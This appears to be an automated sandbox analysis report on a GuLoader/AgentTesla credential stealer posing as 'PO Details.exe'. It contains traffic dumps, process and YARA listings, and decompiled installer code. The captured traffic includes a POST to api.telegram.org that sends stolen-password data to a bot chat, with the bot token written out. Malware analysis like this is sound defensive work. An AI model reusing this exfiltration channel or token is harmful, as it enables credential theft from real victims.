g`RtVy<Tz47JPLHdzmn93v:K8a$m!g%$4$EdiGVr1L "T{D]+h{#+e`HDPm#vyEbK+$BC0U
2022-08-23 11:21:50 UTC	165	IN	Data Raw: 39 91 54 f8 16 93 25 ba fc 57 88 8f b5 e8 a9 2f ca 51 bb 62 0c f7 5b 15 d2 34 fb 9f 16 6c d4 e0 d7 ae 48 8a 5e f4 e6 da 14 28 cb 0f 7c cd 4b 52 40 c7 bb 74 2b 3e 6b ba d4 c7 e7 b1 ff 60 d7 e1 04 32 18 00 20 81 d5 04 b9 d6 7b 1a c2 81 1e 00 96 45 28 89 81 f9 1d 24 bf d0 71 d3 35 b6 f9 73 9f 8c af 73 6f 83 eb 87 d0 06 19 50 4f 4a e2 70 f3 25 a8 b4 bd be 4e 2d 03 c8 7d 5f e9 58 3c 8a 34 a1 b9 6a 4f 8e 0b 21 9b 5e 69 38 05 8a 55 c7 26 58 74 aa 52 43 49 89 d8 d8 d5 f3 3f 8e e5 72 3b 77 67 af e9 7f eb 58 de 00 1f 94 03 31 bc f6 5d 8b 94 f1 8a 96 45 fd f6 f9 32 fe 72 75 7d 62 8b 07 0d 30 d5 27 9d a8 dd b6 7d 81 e0 3e 2a b8 35 34 dc 89 7b 18 89 07 85 13 24 d9 88 82 78 69 16 df 19 3b ee 2f 16 5c 7c 4c 9a 26 4c b2 0f 82 70 30 e0 25 a0 80 48 ac db 94 ac 0e 11 4d 33 Data Ascii: 9T%W/Qb[4lH^(\|KR@t+>k`2 {E($q5ssoPOJp%N-}_X<4jO!^i8U&XtRCI?r;wgX1]E2ru}b0'}>*54{$xi;/\\|L&Lp0%HM3
2022-08-23 11:21:50 UTC	169	IN	Data Raw: ec f6 4e 90 96 07 8b bc d1 ba 02 53 5e fd 22 75 48 79 89 1f 26 f3 58 60 8b c0 b3 b5 2d 81 b7 25 28 0d 30 f7 51 ce 53 b3 e0 04 d5 13 5c c2 8a c0 53 aa 9b 98 00 b2 bb 2c 46 5c e5 57 98 d6 49 71 82 c5 22 cf b0 26 f0 80 f3 b7 d9 31 87 cd 9c 0a 65 7d 7e 27 f4 47 c7 f4 ff 22 5e f6 ab 23 93 35 58 ad 63 e1 8f e9 fe 5c d7 74 2d 7c cb 55 0c 1a 56 e0 f8 20 4c 4f 9f 84 4d c2 d0 1c c9 8b a0 8c f9 9b 0c 7e b3 89 91 da f5 5c a3 7e fe de d8 8c 78 7c 7f 19 66 7a de 57 83 85 6c be fb a9 93 e5 b5 58 89 25 3e c1 4b df 3d 1b 35 31 13 87 9d 66 36 aa 3e 5d bf 00 5f ef e9 f0 75 f4 41 90 25 e1 72 69 be 3b 67 9f ad ba b5 2b 1b 17 ce 35 98 a7 d4 89 66 6b 32 52 23 88 d3 e3 ea d1 dc 5f 0f 2d 2c 13 4c 56 e6 83 e1 d1 49 8d 14 dc 51 a6 cd 58 39 aa 38 c8 3c f1 5b d2 c6 bc 64 87 61 9d 4d Data Ascii: NS^"uHy&X`-%(0QS\S,F\WIq"&1e}~'G"^#5Xc\t-\|UV LOM~\~x\|fzWlX%>K=51f6>]_uA%ri;g+5fk2R#_-,LVIQX98<[daM
2022-08-23 11:21:50 UTC	174	IN	Data Raw: 9d a3 8f a8 c4 5e 8a 94 0f f1 23 cc 75 a4 41 77 9c e3 5f 70 8b af 37 b9 40 86 b5 7b 1b 1f 68 37 ce a3 e1 1d 36 3e 3b 6d 23 d8 d3 c9 4c d3 37 43 3a b9 7c a5 69 69 e6 d3 e1 9a ef 8f 94 d8 64 32 9d 27 74 95 38 98 3c 9d fd d0 7a a1 51 13 31 1f 36 4e bf 2d 8c b1 25 a8 d3 42 49 a0 7a f5 ba 32 3e ac 8f d6 f1 db 9b 69 d1 bb 24 7e 1b ad aa 64 1e 3d 26 47 c5 ad e0 7b 03 34 36 e8 f1 b9 dc b3 2e 5d bd 72 4e 3e c5 d4 5d 8a 0b 75 99 86 6d 52 f9 62 2e be a3 b6 25 b3 61 2f 7a 60 7c 18 7b 18 f0 c5 f0 47 cb 30 7e 1b 31 32 6e 52 0e 9d f7 cb 21 73 49 0b a0 f4 69 8e ec a6 82 5c 1a 5c e3 76 47 44 2e b1 98 fb 7b e5 8a ad 08 f5 b8 ee d6 12 aa 01 ad 52 74 c4 e1 72 1a 79 fb c6 85 fe 69 fc 18 76 54 d5 c0 e0 19 a8 b1 b7 7a f4 16 fe fe 53 da 0f be d7 94 ce 92 73 31 39 bc c3 84 f0 81 Data Ascii: ^#uAw_p7@{h76>;m#L7C:\|iid2't8<zQ16N-%BIz2>i$~d=&G{46.]rN>]umRb.%a/z`\|{G0~12nR!sIi\\vGD.{RtryivTzSs19
2022-08-23 11:21:50 UTC	178	IN	Data Raw: f7 5d 20 42 d4 23 b2 b4 6b f9 dd a4 92 4c 19 ca e3 54 42 61 28 e1 98 63 5a f7 8b ad 08 63 a8 a5 d4 27 a8 51 bd f8 44 c6 e1 72 1a ef fa 99 6d d3 7b bc 1a ad 65 d7 d0 f0 1b 3e b1 32 69 d1 17 ae fe af fb 1d bd d7 94 58 82 ae 20 0c be 93 94 fe b6 2e f3 f4 99 8a a1 bb 00 2b a9 c5 a0 2e 34 c1 80 24 7e 46 35 87 d4 69 5e df 51 ec d9 41 9d 72 9c 7c 21 8a 5f aa a9 76 d8 c2 4a 55 71 27 a3 0b 75 12 f2 a6 df 1b f4 ea 97 bc ec ec 99 2f 07 4b db 38 a4 3d 7d 5d 77 1e 27 b0 1a e2 af 98 c1 71 90 3b e6 98 08 95 64 7b 85 9c 6c da 0c 0f b6 f1 cf f9 fd 14 a1 60 be 96 e2 54 5e c8 c0 b0 54 d8 a9 b1 db 03 90 27 39 ee e1 8b 67 00 00 a3 53 c4 0f b2 82 34 77 89 70 34 87 b9 8a 7a 34 17 9c 9c a5 10 4c 31 59 d4 4e ac 06 7a d1 98 6e cf c2 a2 f1 50 90 31 fc c8 cd 76 ce 1a 4b 2e d6 a1 27 Data Ascii: ] B#kLTBa(cZc'QDrm{e>2iX .+.4$~F5i^QAr\|!_vJUq'u/K8=}]w'q;d{l`T^T'9gS4wp4z4L1YNznP1vK.'
2022-08-23 11:21:50 UTC	182	IN	Data Raw: b6 21 c7 04 fe 35 a7 6f 9e 85 e2 55 5a c7 e3 27 77 d1 a8 10 cd b9 98 2e 3a 36 c5 31 6f e1 06 42 57 f2 10 9e 83 3b 54 9a 70 00 86 b6 a8 d6 2d 3b 9d 5e a0 49 48 1d 58 be 65 82 07 0b d0 31 60 20 c0 8e f2 27 8c c1 f7 fc ce ba cb 82 52 1a c7 7d 23 14 a4 1d dc 19 e6 87 1e f4 27 60 39 61 d5 78 a8 62 b6 df e3 35 68 d5 70 e8 76 cc 4a ee 91 7b d5 91 44 cd f4 78 e5 05 93 ca 98 c8 61 59 5d a5 08 98 6a f3 fe 6f 4f b6 d2 5a 00 e3 ea 1f b1 35 2a b0 e1 39 a5 69 8b e9 e7 ee 6a 31 ea bd 59 5f a3 23 52 0f c6 93 41 0a c3 5d 6c e2 a6 b6 42 9b 40 e5 c7 f5 24 5c c5 75 64 97 44 96 ef 5e 3d 53 c8 a5 00 bc c0 98 4b 5b be d7 86 d8 d0 d8 f3 a8 a7 b8 5c d1 5d a7 34 4e cb e3 87 dd 2e 18 45 0b df 95 95 81 65 87 15 fc bf 57 2b b1 ce 55 24 ed 9d 18 df 1a 24 b4 6c 97 ad af 2a ea b7 6c da Data Ascii: !5oUZ'w.:61oBW;Tp-;^IHXe1` 'R}#'`9axb5hpvJ{DxaY]joOZ59ij1Y_#RA]lB@$\udD^=SK[\]4N.EeW+U$$ll
2022-08-23 11:21:50 UTC	186	IN	Data Raw: 0c f7 0e bb 8d 61 42 6c 8d 4b 2c ae 72 b9 8b 40 7e ac bd 56 72 f8 a6 65 2f e8 de 2c a0 b8 9d 18 a0 41 c5 c8 5a d2 02 f5 77 3c 87 fb b3 e1 34 19 02 2b 88 a5 c3 81 51 9a 34 84 da 3c 43 66 b7 4e 3e ec d6 4e ae 46 4a 9e 04 29 fa 25 65 f2 de 70 c9 1e b8 26 52 01 6a 46 aa 00 35 28 3d 8b bb b9 c0 0c cc b3 27 54 22 2e d2 9d 31 dc 9b 97 22 7e 54 12 5e c8 c5 6f 98 c0 68 c2 d2 33 89 c4 51 0c 9a 06 2a 28 43 8b 6c 43 87 91 35 af d4 cd d2 04 d7 81 41 5f 68 60 96 ae bc 1b 82 d5 42 ec 70 50 a3 e7 ae 32 d8 74 f8 2b a7 b6 1e 25 6b 49 6c d8 94 64 37 55 f4 49 e1 b1 15 e3 b3 65 fe e3 00 b6 e0 48 33 05 50 72 16 e0 72 28 be bc 11 5e 97 5d 10 ef 62 02 fa 7a 8f 04 d7 c8 5c 85 11 da 18 02 2e 4d 2e 32 e0 8c 46 07 21 eb b2 ef c2 3b 5b c9 89 a2 e9 d9 f6 5b 37 dd fd 36 ec 38 1e f9 29 Data Ascii: aBlK,r@~Vre/,AZw<4+Q4<CfN>NFJ)%ep&RjF5(='T".1"~T^oh3Q*(ClC5A_h`BpP2t+%kIld7UIeH3Prr(^]bz\.M.2F!;[[768)
2022-08-23 11:21:50 UTC	190	IN	Data Raw: 3d ef a2 2c 71 44 a4 02 ad e8 65 d2 f2 29 c6 9a 45 f3 bf 63 68 46 1c 2e 25 f6 32 74 88 94 4f 3b b5 52 4e 9f 57 19 c6 51 88 1c 88 88 25 96 00 cf 0e 22 22 4c 6c 63 e0 8b 5c 3e 3f ed e1 a8 b1 23 71 91 e8 9e ed df f7 6a 3d dc ed 62 89 5d 29 e3 0e c7 aa c2 c4 0e 08 0d 70 92 0f 7a 31 b6 c6 5f dd 1a d3 e2 80 d1 0c 77 57 3f ac 19 b5 3d 69 fc 48 74 f5 e9 1f e1 de b0 2c e3 60 7a 9b 44 f9 04 91 35 cf e6 92 3a 23 e3 5c 5b f3 02 cb d2 48 6e 63 3d 35 a9 c6 95 d4 7b 02 57 2d 55 ed d3 b1 19 b0 53 01 43 5b 19 13 35 33 a6 fa 95 b4 df ea f1 ac 3b f2 fc 34 03 c5 3a 8f 59 85 82 b0 10 c4 32 f1 67 fc 50 0e d8 7d cb 5a 61 fc b2 2e 3c 53 7a 0f dd 73 6a 9d e3 0c a4 d9 dc 0c a5 7d 56 bc 79 fd da 40 67 bb 77 29 b0 c8 e0 9b 62 8b 41 b8 f3 ba bd 34 7b 5f ef 17 2d cd ac 7f 2a bf 7a 40 Data Ascii: =,qDe)EchF.%2tO;RNWQ%""Llc\>?#qj=b])pz1_wW?=iHt,`zD5:#\[Hnc=5{W-USC[53;4:Y2gP}Za.<Szsj}Vy@gw)bA4{_-*z@
2022-08-23 11:21:50 UTC	193	IN	Data Raw: b8 b4 79 97 df 16 6d 12 15 cf 80 6d 80 d2 ab 21 70 30 1c 55 c8 a0 38 ea e7 6e e4 d2 0e d4 90 3e 6b bc 1d 18 0d 04 ff 7a 54 ba a0 06 f2 d4 e1 d2 09 de b3 59 4b 7f 44 be a9 a8 14 b0 85 74 ea 70 41 b9 fb 93 27 cb 7f ec 50 c9 e8 41 16 1b 19 2b d6 b7 3a 05 5d ab 00 b9 f1 6d ce e6 27 bf 9f 58 f5 a8 69 7e 5c 1a 32 6c ca 21 75 fc 9a 4d 5e ac 58 51 80 36 2f df 33 a2 00 e1 b8 2c d7 31 cb 7c 0d 30 39 5f 76 e0 90 59 4e 0d f6 f0 b6 a3 06 1f 9e f9 f0 ef c8 92 6a 0e b3 ec 77 da 5e 3a 96 1b de de fc f7 15 09 0f 19 b2 0b 0e 17 c7 87 78 cf 7f e5 e0 e5 f3 29 1f 62 21 d9 36 ac 6d 7a e2 38 73 f6 9d 05 d1 aa a0 2f 8a 67 7e ef 47 88 77 93 30 90 f1 93 5f 33 f9 39 73 ed 47 f6 c5 2b 5d 65 58 72 bc a3 a9 f9 36 0c 5c 2c 7e d1 b6 82 0e d1 74 2f 5f 4e 0e 13 35 33 a7 eb 80 a3 df c9 fd Data Ascii: ymm!p0U8n>kzTYKDtpA'PA+:]m'Xi~\2l!uM^XQ6/3,1\|09_vYNjw^:x)b!6mz8s/g~Gw0_39sG+]eXr6\,~t/_N53
2022-08-23 11:21:50 UTC	197	IN	Data Raw: 45 cd 16 c3 f0 89 f8 3d 72 4a 22 a0 7e 9e 1f 7e f2 4c 74 c3 f4 14 c5 c9 b0 31 f8 7b 0f 88 44 8d 28 a6 24 f7 da 92 2b 02 f2 39 50 fa 33 ec f4 4a 6b 76 3b 5c ba da e1 da 43 0a 55 31 55 f1 d3 8c 0c 8e 72 32 4f 4e 10 7a 15 25 e4 ec 91 8e 96 e3 f1 a9 11 c5 f1 31 02 d9 3a 9b 45 82 b9 b7 17 8f 02 e0 52 e8 4e 12 c9 04 8c 76 66 e4 a6 2e 25 79 08 19 d5 77 48 85 8f 3b 82 ab e2 19 a5 6a 41 a7 59 ea c7 44 7b 9f 62 3c c5 ef a3 9f 7a 97 40 8e 96 9d 8c 30 71 2f d8 00 3a d1 c5 7a 2a cb 56 75 eb fb 24 29 f9 2b 79 4d c1 1b 55 e9 1b 06 7a 10 21 73 0b 7a 9f 32 82 01 8f 77 13 33 48 67 19 39 62 f8 a4 24 52 36 2f 53 f2 d6 06 81 a4 a4 c5 39 6e 9a 91 3b 2a 08 2c b3 fd 04 23 94 fe df 71 33 ca da ad 5e a8 13 d7 e8 06 bc e1 36 60 ef be e3 90 8d 11 ac 5f d7 65 b6 ba e0 7b 44 b1 51 03 Data Ascii: E=rJ"~~Lt1{D($+9P3Jkv;\CU1Ur2ONz%1:ERNvf.%ywH;jAYD{b<z@0q/:zVu$)+yMUz!sz2w3Hg9b$R6/S9n;,#q3^6`_e{DQ
2022-08-23 11:21:50 UTC	201	IN	Data Raw: 70 4e 48 12 7d 18 f1 42 70 a4 d5 0d 5c 48 30 7a 5a 58 1c e9 f3 5a 23 48 42 36 a5 a1 67 f7 d5 b9 81 54 1f ea e1 5a 51 72 29 c1 99 6d 57 e4 84 aa 02 61 aa 37 68 2e a2 5b b1 ef 4f cc eb 71 3a ef f2 9a b0 cb 6c ae 1e aa 66 d1 d1 90 1b 3e b1 30 71 c1 10 a8 ef 2f 2a 09 b6 d7 94 58 96 ba 24 0c be 96 84 ef ae 2b fb f7 89 9a bc b3 00 28 b1 cd b6 ae dd c9 87 24 7d 44 28 82 d2 49 5e d6 58 e5 d0 61 9d 70 84 61 2a 83 4c a3 ab 5c d1 e3 46 5c 71 23 a8 33 69 00 72 4f d7 3d f5 e8 9f a4 fc c4 9f 2f 06 43 d3 15 a7 3a 75 54 7e 23 24 a2 9a 0b a7 b1 d8 70 85 34 e6 be 02 85 6a 6b 8b ac 65 c8 8c e6 be c1 c3 f8 df 05 a0 48 b7 86 ec 44 51 e0 d2 b8 44 d0 b9 99 cb 0d 98 20 3b ed e8 83 77 0e 0a a5 52 c7 07 bc 8c 1e 74 9f 71 36 81 99 88 78 24 06 e0 bb a7 11 45 21 48 74 cc a6 06 79 d9 Data Ascii: pNH}Bp\H0zZXZ#HB6gTZQr)mWa7h.[Oq:lf>0q/X$+($}D(I^XapaL\F\q#3irO=/C:uT~#$p4jkeHDQD ;wRtq6x$E!Hty
2022-08-23 11:21:50 UTC	206	IN	Data Raw: 14 f0 2e b0 ce 63 e5 33 fb b6 09 9f 65 7e a7 bb 60 cf 1e 8f 6b d0 df 78 f5 01 b2 c0 62 97 f0 d5 57 f5 cc be 48 d6 bb 10 d3 11 e5 2f 26 e0 f2 0a 36 24 05 ae 47 d6 8f 6f 83 06 f4 81 65 26 07 44 88 68 b5 1f 92 ae 27 b1 42 23 d9 55 42 a2 08 68 50 b0 63 c7 df ac f6 70 96 2d f2 d4 fc 71 d8 0f 59 ae 1b b0 30 09 b5 3c cf 55 3a 66 11 30 36 7d e9 4a c5 a8 a1 51 8b 03 ff 6a 7b c6 5e b9 6f f3 43 8b 8e d5 c2 d1 c5 c3 d7 5a c8 49 9c 37 3b f4 47 82 5c a6 0f b5 63 df eb 7e be 0d e5 da 0e c7 ea 7a 68 15 39 55 c8 9f bd c8 2b 50 f5 66 c1 02 6a d8 55 79 97 77 5b 5d c9 90 60 38 d7 64 f9 12 81 f5 c4 bc 74 c5 61 d9 20 0a 65 2c 4c d3 4d b7 c0 38 15 d0 48 16 0e 98 df 07 44 94 b6 00 ae ec d2 79 ce 3b ad f3 5d 9d 41 ba 37 7d ba b2 88 d8 02 19 42 47 fd eb b4 f0 77 ba b4 32 be 5c ac Data Ascii: .c3e~`kxbWH/&6$Goe&Dh'B#UBhPcp-qY0<U:f06}JQj{^oCZI7;G\c~zh9U+PfjUyw[]`8dta e,LM8HDy;]A7}BGw2\
2022-08-23 11:21:50 UTC	210	IN	Data Raw: 50 10 eb d0 30 7c a9 02 52 40 8e bb 09 2b b6 76 1c cf f2 e7 2b b4 00 d7 8d 04 6f 18 85 24 2f ce 26 b9 ce 36 71 c2 af 1e 47 96 b7 09 20 9a f4 1d f4 f1 a1 71 a9 35 df f9 22 9a 27 b4 58 6f a8 ba cd d0 5c 19 0b 4f 9d c4 de e8 25 a8 41 ef c6 4e 75 03 a3 7d 4d ec d6 27 ab 34 43 ed 0e 4f db 0b 53 9b d1 43 ac 1e 99 55 60 73 03 74 e2 52 1b 49 16 de dc d7 d1 3f 86 b3 16 3b 77 67 94 e9 00 ee 9a c5 0b 1f 55 5b 57 bc 97 5d f4 94 44 8b d3 47 ca f6 28 6b 8d 72 1c 7d 16 8b 77 26 87 ce 60 9d f4 86 b7 7d 01 e0 01 2a 0c 30 b8 c7 bc 7b d9 d5 61 85 7a 24 a4 88 a1 53 c6 0d de 19 ce 8e 42 16 39 7c 31 9a b7 49 1c 14 a0 70 cc 85 4e a0 e6 48 eb db 44 87 a7 0a 40 33 3c 4b 55 a4 3d 1a 86 fd 5a 5e 9e 3d 4f ef 51 6d e4 33 bb 70 a9 fc 3f d7 19 bb 3b 4b 35 39 61 06 b8 d8 51 4e 0e 9f c9 Data Ascii: P0\|R@+v+o$/&6qG q5"'Xo\O%ANu}M'4COSCU`stRI?;wgU[W]DG(kr}w&`}*0{az$SB9\|1IpNHD@3<KU=Z^=OQm3p?;K59aQN

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49778	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-23 11:22:01 UTC	211	OUT	POST /bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da850df5a12170 Host: api.telegram.org Content-Length: 1005 Expect: 100-continue Connection: Keep-Alive
2022-08-23 11:22:01 UTC	211	IN	HTTP/1.1 100 Continue
2022-08-23 11:22:01 UTC	211	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 38 35 30 64 66 35 61 31 32 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 32 37 30 35 37 30 34 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 38 35 30 64 66 35 61 31 32 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 39 32 38 31 30 30 0a 4f 53 46 75 6c Data Ascii: -----------------------------8da850df5a12170Content-Disposition: form-data; name="chat_id"5270570406-----------------------------8da850df5a12170Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/928100OSFul
2022-08-23 11:22:01 UTC	212	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 23 Aug 2022 11:22:01 GMT Content-Type: application/json Content-Length: 629 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1800,"from":{"id":5148862528,"is_bot":true,"first_name":"originlogger0093_bot","username":"originlogger0093_bot"},"chat":{"id":5270570406,"first_name":"Ken","last_name":"P","type":"private"},"date":1661253721,"document":{"file_name":"user-928100 2022-08-23 01-44-03.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIHCGMEuFnQbQflgOnk46iYcVVZJtfJAALuEQAC0XUpUIu_ygWNbeUWKQQ","file_unique_id":"AgAD7hEAAtF1KVA","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/928100\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO Details.exePID: 6368, Parent PID: 1988

General

Target ID:	1
Start time:	13:21:17
Start date:	23/08/2022
Path:	C:\Users\user\Desktop\PO Details.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO Details.exe"
Imagebase:	0x400000
File size:	180208 bytes
MD5 hash:	111AF5CEB406185D5C636C90292B6A0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7416, Parent PID: 6368

General

Target ID:	8
Start time:	13:21:37
Start date:	23/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO Details.exe"
Imagebase:	0x3a0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7436, Parent PID: 6368

General

Target ID:	9
Start time:	13:21:37
Start date:	23/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO Details.exe"
Imagebase:	0x540000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7452, Parent PID: 6368

General

Target ID:	10
Start time:	13:21:37
Start date:	23/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO Details.exe"
Imagebase:	0x110000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7460, Parent PID: 6368

General

Target ID:	11
Start time:	13:21:37
Start date:	23/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO Details.exe"
Imagebase:	0x700000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.9159098774.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7468, Parent PID: 7460

General

Target ID:	12
Start time:	13:21:38
Start date:	23/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6dd6d0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: PO Details.exePID: 6368, Parent PID: 1988COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	15.2%
Signature Coverage:	19.9%
Total number of Nodes:	1851
Total number of Limit Nodes:	51

Executed Functions

Function 004034C5 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t71;
				int _t74;
				intOrPtr* _t75;
				int _t76;
				int _t78;
				void* _t102;
				signed int _t119;
				void* _t122;
				void* _t127;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				int _t150;
				void* _t153;
				int _t154;
				signed int _t158;
				signed int _t163;
				signed int _t168;
				void* _t170;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				CHAR* _t184;
				WCHAR* _t185;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t150 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x434f0c = _t51;
				if(_t51 != 6) {
					_t148 = E00406806(0);
					if(_t148 != 0) {
						 *_t148(0xc00);
					}
				}
				_t184 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t150); // executed
				 *0x434fd8 = _t56;
				SHGetFileInfoW(0x42b228, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
				E00406411(0x433f00, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\Arthur\\Desktop\\PO Details.exe\" ";
				E00406411(_t192, _t60);
				 *0x434f00 = 0x400000;
				_t62 = _t192;
				if(L"\"C:\\Users\\Arthur\\Desktop\\PO Details.exe\" " == 0x22) {
					_t62 =  &M00440002;
					_t170 = 0x22;
				}
				_t154 = CharNextW(E00405D13(_t62, _t170));
				 *(_t196 + 0x18) = _t154;
				_t65 =  *_t154;
				if(_t65 == _t150) {
					L33:
					_t185 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t67 = E00403494(_t154, 0);
					_t224 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t69 = E00403015(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t69;
						if(_t69 != _t150) {
							L48:
							E00403A06();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t150;
							if( *(_t196 + 0x10) == _t150) {
								__eflags =  *0x434fb4 - _t150;
								if( *0x434fb4 == _t150) {
									L72:
									_t71 =  *0x434fcc;
									__eflags = _t71 - 0xffffffff;
									if(_t71 != 0xffffffff) {
										 *(_t196 + 0x10) = _t71;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t74;
								if(_t74 != 0) {
									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
								}
								_t75 = E00406806(4);
								__eflags = _t75 - _t150;
								if(_t75 == _t150) {
									L70:
									_t76 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t76;
									if(_t76 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
									__eflags = _t78;
									if(_t78 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405A77( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x434f20 == _t150) {
							L47:
